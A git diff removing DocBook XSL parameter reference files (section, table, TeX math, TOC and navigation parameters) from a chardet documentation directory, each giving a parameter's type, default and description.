mode 100644 index 167f6c7..0000000 --- a/chardet/docs/docbook/xsl/params/saxon.character.representation.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -saxon.character.representation -string - - -saxon.character.representation -Saxon character representation used in generated HTML pages - - -<xsl:param name="saxon.character.representation" select="'entity;decimal'"/> - - -Description - -This character representation is used in files generated by chunking stylesheet. If -you want to suppress entity references for characters with direct representation -in default.encoding, set this parameter to value native. - - - -This parameter is documented here, but the declaration is actually -in the chunker.xsl stylesheet module. - - - - diff --git a/chardet/docs/docbook/xsl/params/saxon.linenumbering.xml b/chardet/docs/docbook/xsl/params/saxon.linenumbering.xml deleted file mode 100644 index 8b3d557..0000000 --- a/chardet/docs/docbook/xsl/params/saxon.linenumbering.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -saxon.linenumbering -boolean - - -saxon.linenumbering -Enable the line numbering extension - - - - - - -Description - -If true, verbatim environments (elements that have the -format='linespecific' notation attribute: address, literallayout, -programlisting, screen, synopsis) that specify line numbering will -have, surprise, line numbers. - - - - diff --git a/chardet/docs/docbook/xsl/params/saxon.tablecolumns.xml b/chardet/docs/docbook/xsl/params/saxon.tablecolumns.xml deleted file mode 100644 index 8a7482a..0000000 --- a/chardet/docs/docbook/xsl/params/saxon.tablecolumns.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -saxon.tablecolumns -boolean - - -saxon.tablecolumns -Enable the table columns extension function - - - - - - -Description - -The table columns extension function adjusts the widths of table -columns in the HTML result to more accurately reflect the specifications -in the CALS table. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.autolabel.xml b/chardet/docs/docbook/xsl/params/section.autolabel.xml deleted file mode 100644 index d68966d..0000000 --- a/chardet/docs/docbook/xsl/params/section.autolabel.xml +++ /dev/null @@ -1,21 +0,0 @@ - - -section.autolabel -boolean - - -section.autolabel -Are sections enumerated? - - - - - - -Description - -If true (non-zero), unlabeled sections will be enumerated. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.label.includes.component.label.xml b/chardet/docs/docbook/xsl/params/section.label.includes.component.label.xml deleted file mode 100644 index 124d233..0000000 --- a/chardet/docs/docbook/xsl/params/section.label.includes.component.label.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -section.label.includes.component.label -boolean - - -section.label.includes.component.label -Do section labels include the component label? - - - - - - -Description - -If true (non-zero), section labels are prefixed with the label of the -component that contains them. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.level1.properties.xml b/chardet/docs/docbook/xsl/params/section.level1.properties.xml deleted file mode 100644 index c0a804d..0000000 --- a/chardet/docs/docbook/xsl/params/section.level1.properties.xml +++ /dev/null @@ -1,39 +0,0 @@ - - -section.level1.properties -attribute set - - -section.level1.properties -Properties for level-1 sections - - - - - - - - - -Description - -The properties that apply to the containing -block of a level-1 section, and therefore apply to -the whole section. This includes sect1 -elements and section elements at level 1. - - -For example, you could start each level-1 section on -a new page by using: -<xsl:attribute-set name="section.level1.properties"> - <xsl:attribute name="break-before">page</xsl:attribute> -</xsl:attribute-set> - - -This attribute set inherits attributes from the -general section.properties attribute set. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.level2.properties.xml b/chardet/docs/docbook/xsl/params/section.level2.properties.xml deleted file mode 100644 index 15af8aa..0000000 --- a/chardet/docs/docbook/xsl/params/section.level2.properties.xml +++ /dev/null @@ -1,39 +0,0 @@ - - -section.level2.properties -attribute set - - -section.level2.properties -Properties for level-2 sections - - - - - - - - - -Description - -The properties that apply to the containing -block of a level-2 section, and therefore apply to -the whole section. This includes sect2 -elements and section elements at level 2. - - -For example, you could start each level-2 section on -a new page by using: -<xsl:attribute-set name="section.level2.properties"> - <xsl:attribute name="break-before">page</xsl:attribute> -</xsl:attribute-set> - - -This attribute set inherits attributes from the -general section.properties attribute set. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.level3.properties.xml b/chardet/docs/docbook/xsl/params/section.level3.properties.xml deleted file mode 100644 index c6a29b0..0000000 --- a/chardet/docs/docbook/xsl/params/section.level3.properties.xml +++ /dev/null @@ -1,39 +0,0 @@ - - -section.level3.properties -attribute set - - -section.level3.properties -Properties for level-3 sections - - - - - - - - - -Description - -The properties that apply to the containing -block of a level-3 section, and therefore apply to -the whole section. This includes sect3 -elements and section elements at level 3. - - -For example, you could start each level-3 section on -a new page by using: -<xsl:attribute-set name="section.level3.properties"> - <xsl:attribute name="break-before">page</xsl:attribute> -</xsl:attribute-set> - - -This attribute set inherits attributes from the -general section.properties attribute set. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.level4.properties.xml b/chardet/docs/docbook/xsl/params/section.level4.properties.xml deleted file mode 100644 index 967ed94..0000000 --- a/chardet/docs/docbook/xsl/params/section.level4.properties.xml +++ /dev/null @@ -1,39 +0,0 @@ - - -section.level4.properties -attribute set - - -section.level4.properties -Properties for level-4 sections - - - - - - - - - -Description - -The properties that apply to the containing -block of a level-4 section, and therefore apply to -the whole section. This includes sect4 -elements and section elements at level 4. - - -For example, you could start each level-4 section on -a new page by using: -<xsl:attribute-set name="section.level4.properties"> - <xsl:attribute name="break-before">page</xsl:attribute> -</xsl:attribute-set> - - -This attribute set inherits attributes from the -general section.properties attribute set. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.level5.properties.xml b/chardet/docs/docbook/xsl/params/section.level5.properties.xml deleted file mode 100644 index d1a30c9..0000000 --- a/chardet/docs/docbook/xsl/params/section.level5.properties.xml +++ /dev/null @@ -1,39 +0,0 @@ - - -section.level5.properties -attribute set - - -section.level5.properties -Properties for level-5 sections - - - - - - - - - -Description - -The properties that apply to the containing -block of a level-5 section, and therefore apply to -the whole section. This includes sect5 -elements and section elements at level 5. - - -For example, you could start each level-5 section on -a new page by using: -<xsl:attribute-set name="section.level5.properties"> - <xsl:attribute name="break-before">page</xsl:attribute> -</xsl:attribute-set> - - -This attribute set inherits attributes from the -general section.properties attribute set. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.level6.properties.xml b/chardet/docs/docbook/xsl/params/section.level6.properties.xml deleted file mode 100644 index 8bd590c..0000000 --- a/chardet/docs/docbook/xsl/params/section.level6.properties.xml +++ /dev/null @@ -1,39 +0,0 @@ - - -section.level6.properties -attribute set - - -section.level6.properties -Properties for level-6 sections - - - - - - - - - -Description - -The properties that apply to the containing -block of a level 6 or lower section, and therefore apply to -the whole section. This includes -section elements at level 6 and lower. - - -For example, you could start each level-6 section on -a new page by using: -<xsl:attribute-set name="section.level6.properties"> - <xsl:attribute name="break-before">page</xsl:attribute> -</xsl:attribute-set> - - -This attribute set inherits attributes from the -general section.properties attribute set. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.properties.xml b/chardet/docs/docbook/xsl/params/section.properties.xml deleted file mode 100644 index bd83a74..0000000 --- a/chardet/docs/docbook/xsl/params/section.properties.xml +++ /dev/null @@ -1,30 +0,0 @@ - - -section.properties -attribute set - - -section.properties -Properties for all section levels - - - - - - - - - -Description - -The properties that apply to the containing -block of all section levels, and therefore apply to -the whole section. -This attribute set is inherited by the -more specific attribute sets such as -section.level1.properties. -The default is empty. - - - - diff --git a/chardet/docs/docbook/xsl/params/section.title.level1.properties.xml b/chardet/docs/docbook/xsl/params/section.title.level1.properties.xml deleted file mode 100644 index 9b85845..0000000 --- a/chardet/docs/docbook/xsl/params/section.title.level1.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -section.title.level1.properties -attribute set - - -section.title.level1.properties -Properties for level-1 section titles - - - - - - - - pt - - - - - -Description - -The properties of level-1 section titles. - - - diff --git a/chardet/docs/docbook/xsl/params/section.title.level2.properties.xml b/chardet/docs/docbook/xsl/params/section.title.level2.properties.xml deleted file mode 100644 index f6f7d20..0000000 --- a/chardet/docs/docbook/xsl/params/section.title.level2.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -section.title.level2.properties -attribute set - - -section.title.level2.properties -Properties for level-1 section titles - - - - - - - - pt - - - - - -Description - -The properties of level-2 section titles. - - - diff --git a/chardet/docs/docbook/xsl/params/section.title.level3.properties.xml b/chardet/docs/docbook/xsl/params/section.title.level3.properties.xml deleted file mode 100644 index b895e23..0000000 --- a/chardet/docs/docbook/xsl/params/section.title.level3.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -section.title.level3.properties -attribute set - - -section.title.level3.properties -Properties for level-1 section titles - - - - - - - - pt - - - - - -Description - -The properties of level-3 section titles. - - - diff --git a/chardet/docs/docbook/xsl/params/section.title.level4.properties.xml b/chardet/docs/docbook/xsl/params/section.title.level4.properties.xml deleted file mode 100644 index 36c7b72..0000000 --- a/chardet/docs/docbook/xsl/params/section.title.level4.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -section.title.level4.properties -attribute set - - -section.title.level4.properties -Properties for level-1 section titles - - - - - - - - pt - - - - - -Description - -The properties of level-4 section titles. - - - diff --git a/chardet/docs/docbook/xsl/params/section.title.level5.properties.xml b/chardet/docs/docbook/xsl/params/section.title.level5.properties.xml deleted file mode 100644 index 464afa7..0000000 --- a/chardet/docs/docbook/xsl/params/section.title.level5.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -section.title.level5.properties -attribute set - - -section.title.level5.properties -Properties for level-1 section titles - - - - - - - - pt - - - - - -Description - -The properties of level-5 section titles. - - - diff --git a/chardet/docs/docbook/xsl/params/section.title.level6.properties.xml b/chardet/docs/docbook/xsl/params/section.title.level6.properties.xml deleted file mode 100644 index af38967..0000000 --- a/chardet/docs/docbook/xsl/params/section.title.level6.properties.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -section.title.level6.properties -attribute set - - -section.title.level6.properties -Properties for level-1 section titles - - - - - - - - pt - - - - - -Description - -The properties of level-6 section titles. This property set is actually -used for all titles below level 5. - - - diff --git a/chardet/docs/docbook/xsl/params/section.title.properties.xml b/chardet/docs/docbook/xsl/params/section.title.properties.xml deleted file mode 100644 index b2b6c8e..0000000 --- a/chardet/docs/docbook/xsl/params/section.title.properties.xml +++ /dev/null @@ -1,32 +0,0 @@ - - -section.title.properties -attribute set - - -section.title.properties -Properties for section titles - - - - - - - - - bold - - always - 0.8em - 1.0em - 1.2em - - - - -Description - -The properties common to all section titles. - - - diff --git a/chardet/docs/docbook/xsl/params/segmentedlist.as.table.xml b/chardet/docs/docbook/xsl/params/segmentedlist.as.table.xml deleted file mode 100644 index e7ce9c8..0000000 --- a/chardet/docs/docbook/xsl/params/segmentedlist.as.table.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -segmentedlist.as.table -boolean - - -segmentedlist.as.table -Format segmented lists as tables? - - - - - - - - -Description - -If non-zero, segmentedlists will be formatted as -tables. - - - diff --git a/chardet/docs/docbook/xsl/params/shade.verbatim.style.xml b/chardet/docs/docbook/xsl/params/shade.verbatim.style.xml deleted file mode 100644 index 34805ce..0000000 --- a/chardet/docs/docbook/xsl/params/shade.verbatim.style.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -shade.verbatim.style - - - -shade.verbatim.style -Properties that specify the style of shaded verbatim listings - - - - - - 0 - #E0E0E0 - - - #E0E0E0 - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/shade.verbatim.xml b/chardet/docs/docbook/xsl/params/shade.verbatim.xml deleted file mode 100644 index 5f054ff..0000000 --- a/chardet/docs/docbook/xsl/params/shade.verbatim.xml +++ /dev/null @@ -1,20 +0,0 @@ - - -shade.verbatim -boolean - - -shade.verbatim -Should verbatim environments be shaded? - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/show.comments.xml b/chardet/docs/docbook/xsl/params/show.comments.xml deleted file mode 100644 index 1757fb4..0000000 --- a/chardet/docs/docbook/xsl/params/show.comments.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -show.comments -boolean - - -show.comments -Display comment elements? - - - -1 - - -Description - -If true (non-zero), comments will be displayed, otherwise they are suppressed. -Comments here refers to the comment element, -which will be renamed remark in DocBook V4.0, -not XML comments (<-- like this -->) which are unavailable. - - - - diff --git a/chardet/docs/docbook/xsl/params/show.revisionflag.xml b/chardet/docs/docbook/xsl/params/show.revisionflag.xml deleted file mode 100644 index 94360b5..0000000 --- a/chardet/docs/docbook/xsl/params/show.revisionflag.xml +++ /dev/null @@ -1,35 +0,0 @@ - - -show.revisionflag -boolean - - -show.revisionflag -Enable decoration of elements that have a revisionflag - - - -0 - - -Description - - -If show.revisionflag is turned on, then the stylesheets -may produce additional markup designed to allow a CSS stylesheet to -highlight elements that have specific revisionflag settings. - -The markup inserted will be usually be either a <span> or <div> -with an appropriate class attribute. (The value of -the class attribute will be the same as the value of the revisionflag -attribute). In some contexts, for example tables, where extra markup -would be structurally illegal, the class attribute will be added to the -appropriate container element. - -In general, the stylesheets only test for revisionflag in contexts -where an importing stylesheet would have to redefine whole templates. -Most of the revisionflag processing is expected to be done by another -stylesheet, for example changebars.xsl. - - - diff --git a/chardet/docs/docbook/xsl/params/sidebar.properties.xml b/chardet/docs/docbook/xsl/params/sidebar.properties.xml deleted file mode 100644 index 8c54a36..0000000 --- a/chardet/docs/docbook/xsl/params/sidebar.properties.xml +++ /dev/null @@ -1,38 +0,0 @@ - - -sidebar.properties -attribute set - - -sidebar.properties -Attribute set for sidebar properties - - - - - - solid - 1pt - black - #DDDDDD - 12pt - 12pt - 6pt - 6pt - - - - - -Description - -The styling for sidebars. - - - diff --git a/chardet/docs/docbook/xsl/params/spacing.paras.xml b/chardet/docs/docbook/xsl/params/spacing.paras.xml deleted file mode 100644 index f9fa226..0000000 --- a/chardet/docs/docbook/xsl/params/spacing.paras.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -spacing.paras -boolean - - -spacing.paras -Insert additional <p> elements for spacing? - - - - - - -Description - -When non-zero, additional, empty paragraphs are inserted in -several contexts (for example, around informal figures), to create a -more pleasing visual appearance in many browsers. - - - - diff --git a/chardet/docs/docbook/xsl/params/subscript.properties.xml b/chardet/docs/docbook/xsl/params/subscript.properties.xml deleted file mode 100644 index bd90a09..0000000 --- a/chardet/docs/docbook/xsl/params/subscript.properties.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -subscript.properties - - - -subscript.properties -Properties associated with subscripts - - - - - - 75% - - - - -Description - -Specifies styling properties for subscripts. - - - diff --git a/chardet/docs/docbook/xsl/params/superscript.properties.xml b/chardet/docs/docbook/xsl/params/superscript.properties.xml deleted file mode 100644 index 8a5d5c0..0000000 --- a/chardet/docs/docbook/xsl/params/superscript.properties.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -superscript.properties - - - -superscript.properties -Properties associated with superscripts - - - - - - 75% - - - - -Description - -Specifies styling properties for superscripts. - - - diff --git a/chardet/docs/docbook/xsl/params/suppress.footer.navigation.xml b/chardet/docs/docbook/xsl/params/suppress.footer.navigation.xml deleted file mode 100644 index 90101d4..0000000 --- a/chardet/docs/docbook/xsl/params/suppress.footer.navigation.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -suppress.footer.navigation -boolean - - -suppress.footer.navigation -Disable footer navigation - - - -0 - - -Description - - -If suppress.footer.navigation is turned on, footer -navigation will be suppressed. - - - diff --git a/chardet/docs/docbook/xsl/params/suppress.header.navigation.xml b/chardet/docs/docbook/xsl/params/suppress.header.navigation.xml deleted file mode 100644 index 276e28c..0000000 --- a/chardet/docs/docbook/xsl/params/suppress.header.navigation.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -suppress.header.navigation -boolean - - -suppress.header.navigation -Disable header navigation - - - -0 - - -Description - - -If suppress.header.navigation is turned on, header -navigation will be suppressed. - - - diff --git a/chardet/docs/docbook/xsl/params/suppress.navigation.xml b/chardet/docs/docbook/xsl/params/suppress.navigation.xml deleted file mode 100644 index a06568e..0000000 --- a/chardet/docs/docbook/xsl/params/suppress.navigation.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -suppress.navigation -boolean - - -suppress.navigation -Disable header and footer navigation - - - -0 - - -Description - - -If suppress.navigation is turned on, header and -footer navigation will be suppressed. - - - diff --git a/chardet/docs/docbook/xsl/params/symbol.font.family.xml b/chardet/docs/docbook/xsl/params/symbol.font.family.xml deleted file mode 100644 index 0f038e7..0000000 --- a/chardet/docs/docbook/xsl/params/symbol.font.family.xml +++ /dev/null @@ -1,36 +0,0 @@ - - -symbol.font.family - - - -symbol.font.family -The font families to be searched for symbols outside - of the body font - - - - - - - - -Description - -A typical body or title font does not contain all -the character glyphs that DocBook supports. This parameter -specifies additional fonts that should be searched for -special characters not in the normal font. -These symbol font names are automatically appended -to the body or title font family name when fonts -are specified in a -font-family -property in the FO output. - -The symbol font names should be entered as a -comma-separated list. The default value is -Symbol,ZapfDingbats. - - - - diff --git a/chardet/docs/docbook/xsl/params/table.borders.with.css.xml b/chardet/docs/docbook/xsl/params/table.borders.with.css.xml deleted file mode 100644 index 2054b73..0000000 --- a/chardet/docs/docbook/xsl/params/table.borders.with.css.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -table.borders.with.css -boolean - - -table.borders.with.css -Use CSS to specify table, row, and cell borders? - - - - - - - - -Description - -If true (non-zero), CSS will be used to draw table borders. - - - - diff --git a/chardet/docs/docbook/xsl/params/table.cell.border.color.xml b/chardet/docs/docbook/xsl/params/table.cell.border.color.xml deleted file mode 100644 index 1299a9e..0000000 --- a/chardet/docs/docbook/xsl/params/table.cell.border.color.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -table.cell.border.color - - - -table.cell.border.color - - - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/table.cell.border.style.xml b/chardet/docs/docbook/xsl/params/table.cell.border.style.xml deleted file mode 100644 index 26b416d..0000000 --- a/chardet/docs/docbook/xsl/params/table.cell.border.style.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -table.cell.border.style - - - -table.cell.border.style - - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/table.cell.border.thickness.xml b/chardet/docs/docbook/xsl/params/table.cell.border.thickness.xml deleted file mode 100644 index 9c2c8ea..0000000 --- a/chardet/docs/docbook/xsl/params/table.cell.border.thickness.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -table.cell.border.thickness - - - -table.cell.border.thickness - - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/table.cell.padding.xml b/chardet/docs/docbook/xsl/params/table.cell.padding.xml deleted file mode 100644 index 5b3342f..0000000 --- a/chardet/docs/docbook/xsl/params/table.cell.padding.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -table.cell.padding - - - -table.cell.padding - - - - - - - 2pt - 2pt - 2pt - 2pt - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/table.entry.padding.xml b/chardet/docs/docbook/xsl/params/table.entry.padding.xml deleted file mode 100644 index 4775f6c..0000000 --- a/chardet/docs/docbook/xsl/params/table.entry.padding.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -table.entry.padding - - - -table.entry.padding - - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/table.footnote.number.format.xml b/chardet/docs/docbook/xsl/params/table.footnote.number.format.xml deleted file mode 100644 index 7ea911e..0000000 --- a/chardet/docs/docbook/xsl/params/table.footnote.number.format.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -table.footnote.number.format -string - - -table.footnote.number.format -Identifies the format used for footnote numbers in tables - - - - - - - - -Description - -The table.footnote.number.format specifies the format -to use for footnote numeration (1, i, I, a, or A) in tables. - - - diff --git a/chardet/docs/docbook/xsl/params/table.footnote.number.symbols.xml b/chardet/docs/docbook/xsl/params/table.footnote.number.symbols.xml deleted file mode 100644 index 8c4f4e3..0000000 --- a/chardet/docs/docbook/xsl/params/table.footnote.number.symbols.xml +++ /dev/null @@ -1,34 +0,0 @@ - - -table.footnote.number.symbols - - - -table.footnote.number.symbols - - - - - - - - - -Description - -If table.footnote.number.symbols is not the empty string, -table footnotes will use the characters it contains as footnote symbols. For example, -*&#x2020;&#x2021;&#x25CA;&#x2720; will identify -footnotes with *, , , -, and . If there are more footnotes -than symbols, the stylesheets will fall back to numbered footnotes using -table.footnote.number.format. - -The use of symbols for footnotes depends on the ability of your -processor (or browser) to render the symbols you select. Not all systems are -capable of displaying the full range of Unicode characters. If the quoted characters -in the preceding paragraph are not displayed properly, that's a good indicator -that you may have trouble using those symbols for footnotes. - - - diff --git a/chardet/docs/docbook/xsl/params/table.frame.border.color.xml b/chardet/docs/docbook/xsl/params/table.frame.border.color.xml deleted file mode 100644 index b0e229f..0000000 --- a/chardet/docs/docbook/xsl/params/table.frame.border.color.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -table.frame.border.color - - - -table.frame.border.color - - - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/table.frame.border.style.xml b/chardet/docs/docbook/xsl/params/table.frame.border.style.xml deleted file mode 100644 index 5a15e06..0000000 --- a/chardet/docs/docbook/xsl/params/table.frame.border.style.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -table.frame.border.style - - - -table.frame.border.style - - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/table.frame.border.thickness.xml b/chardet/docs/docbook/xsl/params/table.frame.border.thickness.xml deleted file mode 100644 index 0b5f2cb..0000000 --- a/chardet/docs/docbook/xsl/params/table.frame.border.thickness.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -table.frame.border.thickness - - - -table.frame.border.thickness -Specifies the thickness of the frame border - - - - - - - - -Description - -Specifies the thickness of the border on the table's frame. - - - diff --git a/chardet/docs/docbook/xsl/params/table.properties.xml b/chardet/docs/docbook/xsl/params/table.properties.xml deleted file mode 100644 index 4abff03..0000000 --- a/chardet/docs/docbook/xsl/params/table.properties.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -table.properties -Properties associated with the block surrounding a table - - - - - - - - -Description - -Block styling properties for tables. This parameter should really -have been called table.block.properties or something -like that, but weג€™re leaving it to avoid backwards-compatibility -problems. - -See also table.table.properties. - - - diff --git a/chardet/docs/docbook/xsl/params/table.table.properties.xml b/chardet/docs/docbook/xsl/params/table.table.properties.xml deleted file mode 100644 index 581b989..0000000 --- a/chardet/docs/docbook/xsl/params/table.table.properties.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -table.table.properties -Properties associated with a table - - - - - - retain - collapse - - - - -Description - -The styling for tables. This parameter should really -have been called table.properties, but that parameter -name was inadvertantly established for the block-level properties -of the table as a whole. - - -See also table.properties. - - - diff --git a/chardet/docs/docbook/xsl/params/tablecolumns.extension.xml b/chardet/docs/docbook/xsl/params/tablecolumns.extension.xml deleted file mode 100644 index 7726312..0000000 --- a/chardet/docs/docbook/xsl/params/tablecolumns.extension.xml +++ /dev/null @@ -1,23 +0,0 @@ - - -tablecolumns.extension -boolean - - -tablecolumns.extension -Enable the table columns extension function - - - - - - -Description - -The table columns extension function adjusts the widths of table -columns in the HTML result to more accurately reflect the specifications -in the CALS table. - - - - diff --git a/chardet/docs/docbook/xsl/params/target.database.document.xml b/chardet/docs/docbook/xsl/params/target.database.document.xml deleted file mode 100644 index 01d95ab..0000000 --- a/chardet/docs/docbook/xsl/params/target.database.document.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -target.database.document -uri - - -target.database.document -Name of master database file for resolving -olinks - - - - - - -Description - -To resolve olinks between documents, the stylesheets use -a master database document that identifies the target datafiles for all the documents within the scope -of the olinks. This parameter value is the URI of -the master document to be read during processing to resolve olinks. -The default value is olinkdb.xml. -The data structure of the file is defined in the targetdatabase.dtd DTD. The database file provides the high level elements to record the identifiers, locations, and relationships of documents. The cross reference data for individual documents is generally pulled into the database using system entity references or XIncludes. See also targets.filename. - - - - diff --git a/chardet/docs/docbook/xsl/params/targets.filename.xml b/chardet/docs/docbook/xsl/params/targets.filename.xml deleted file mode 100644 index d9b71a2..0000000 --- a/chardet/docs/docbook/xsl/params/targets.filename.xml +++ /dev/null @@ -1,27 +0,0 @@ - - -targets.filename -string - - -targets.filename -Name of cross reference targets data file - - - - - - -Description - -In order to resolve olinks efficiently, the stylesheets can -generate an external data file containing information about -all potential cross reference endpoints in a document. -This parameter lets you change the name of the generated -file from the default name target.db. -The name must agree with that used in the target database -used to resolve olinks during processing. -See also target.database.document. - - - diff --git a/chardet/docs/docbook/xsl/params/template.xml b/chardet/docs/docbook/xsl/params/template.xml deleted file mode 100644 index 0b97c3a..0000000 --- a/chardet/docs/docbook/xsl/params/template.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -[[NAME]] - - - -[[NAME]] - - - - - - - - - -Description - -FIXME: - - - diff --git a/chardet/docs/docbook/xsl/params/tex.math.delims.xml b/chardet/docs/docbook/xsl/params/tex.math.delims.xml deleted file mode 100644 index d2e01f9..0000000 --- a/chardet/docs/docbook/xsl/params/tex.math.delims.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -tex.math.delims -boolean - - -tex.math.delims -Should be equations outputed for processing by TeX -automatically surrounded by math mode delimiters - - - - - - - - -Description - -For compatibility with DSSSL based DBTeXMath from Allin Cottrell -you should set this parameter to 0. - - - diff --git a/chardet/docs/docbook/xsl/params/tex.math.file.xml b/chardet/docs/docbook/xsl/params/tex.math.file.xml deleted file mode 100644 index 566177a..0000000 --- a/chardet/docs/docbook/xsl/params/tex.math.file.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -tex.math.file -string - - -tex.math.file -Name of temporary file for generating images from equations - - - - - - - - -Description - -Name of auxiliary file for TeX equations. This file can be -processed by dvi2bitmap to get bitmap versions of equations for HTML -output. - - - diff --git a/chardet/docs/docbook/xsl/params/tex.math.in.alt.xml b/chardet/docs/docbook/xsl/params/tex.math.in.alt.xml deleted file mode 100644 index 0b956c6..0000000 --- a/chardet/docs/docbook/xsl/params/tex.math.in.alt.xml +++ /dev/null @@ -1,56 +0,0 @@ - - -tex.math.in.alt -string - - -tex.math.in.alt -TeX notation used for equations - - - - - - - - -Description - -If you want type math directly in TeX notation in equations, -this parameter specifies notation used. Currently are supported two -values -- plain and latex. Empty -value means that you are not using TeX math at all. - -Preferred way for including TeX alternative of math is inside of -textobject element. Eg.: - - - - - - -E=mc squared -E=mc^2 - -]]> - -If you are using graphic element, you can -store TeX inside alt element: - - -a^2+b^2=c^2 - -]]> - -If you want use this feature, you should process your FO with -PassiveTeX, which only supports TeX math notation. When calling -stylsheet, don't forget to specify also -passivetex.extensions=1. - -If you want equations in HTML, just process generated file -tex-math-equations.tex by TeX or LaTeX. Then run -dvi2bitmap program on result DVI file. You will get images for -equations in your document. - - - diff --git a/chardet/docs/docbook/xsl/params/textinsert.extension.xml b/chardet/docs/docbook/xsl/params/textinsert.extension.xml deleted file mode 100644 index 8a3a0f2..0000000 --- a/chardet/docs/docbook/xsl/params/textinsert.extension.xml +++ /dev/null @@ -1,22 +0,0 @@ - - -textinsert.extension -boolean - - -textinsert.extension -Enable the textinsert extension element - - - - - - -Description - -The textinsert extension element inserts the contents of a -a file into the result tree (as text). - - - - diff --git a/chardet/docs/docbook/xsl/params/title.font.family.xml b/chardet/docs/docbook/xsl/params/title.font.family.xml deleted file mode 100644 index 7599607..0000000 --- a/chardet/docs/docbook/xsl/params/title.font.family.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -title.font.family - - - -title.font.family -The default font family for titles - - - - - - - - -Description - -The title font family is used for titles (chapter, section, figure, -etc.) - - - - diff --git a/chardet/docs/docbook/xsl/params/title.margin.left.xml b/chardet/docs/docbook/xsl/params/title.margin.left.xml deleted file mode 100644 index 140d7f5..0000000 --- a/chardet/docs/docbook/xsl/params/title.margin.left.xml +++ /dev/null @@ -1,45 +0,0 @@ - - -title.margin.left - - - -title.margin.left -Adjust the left margin for titles - - - - - - - 0pt - -4pc - - - - - -Description - -This parameter adjusts the left margin for titles, -effectively leaving the titles at the left -margin and indenting the body text. -The default value is -4pc, which means the -body text is indented 4 picas relative to -the titles. - - -If you set the value to zero, be sure to still include -a unit indicator such as 0pt, or -the FO processor will report errors. - - -This parameter is set to 0pt if the -passivetex.extensions -parameter is nonzero because PassiveTeX cannot handle -the math expression with negative values -used to calculate the indents. - - - - diff --git a/chardet/docs/docbook/xsl/params/toc.indent.width.xml b/chardet/docs/docbook/xsl/params/toc.indent.width.xml deleted file mode 100644 index 5ca83a4..0000000 --- a/chardet/docs/docbook/xsl/params/toc.indent.width.xml +++ /dev/null @@ -1,28 +0,0 @@ - - -toc.indent.width -float - - -toc.indent.width -Amount of indentation for TOC entries - - - - - - - - -Description - -Specifies, in points, the distance by which each level of the -TOC is indented from its parent. - -This value is expressed in points, without -a unit (in other words, it is a bare number). Using a bare number allows the stylesheet -to perform calculations that would otherwise have to be performed by the FO processor -because not all processors support expressions. - - - diff --git a/chardet/docs/docbook/xsl/params/toc.list.type.xml b/chardet/docs/docbook/xsl/params/toc.list.type.xml deleted file mode 100644 index a0475b8..0000000 --- a/chardet/docs/docbook/xsl/params/toc.list.type.xml +++ /dev/null @@ -1,25 +0,0 @@ - - -toc.list.type -list -dl -ul -ol - - -toc.list.type -Type of HTML list element to use for Tables of Contents - - - -dl - - -Description - -When an automatically generated Table of Contents (or List of Titles) -is produced, this HTML element will be used to make the list. - - - - diff --git a/chardet/docs/docbook/xsl/params/toc.margin.properties.xml b/chardet/docs/docbook/xsl/params/toc.margin.properties.xml deleted file mode 100644 index 0773967..0000000 --- a/chardet/docs/docbook/xsl/params/toc.margin.properties.xml +++ /dev/null @@ -1,24 +0,0 @@ - - -toc.margin.properties -Margin properties used on Tables of Contents - - - - - - 0.5em - 1em - 2em - 0.5em - 1em - 2em - - - - -Description -This attribute set is used on Tables of Contents. These attributes are set -on the wrapper that surrounds the ToC block, not on each individual lines. - - diff --git 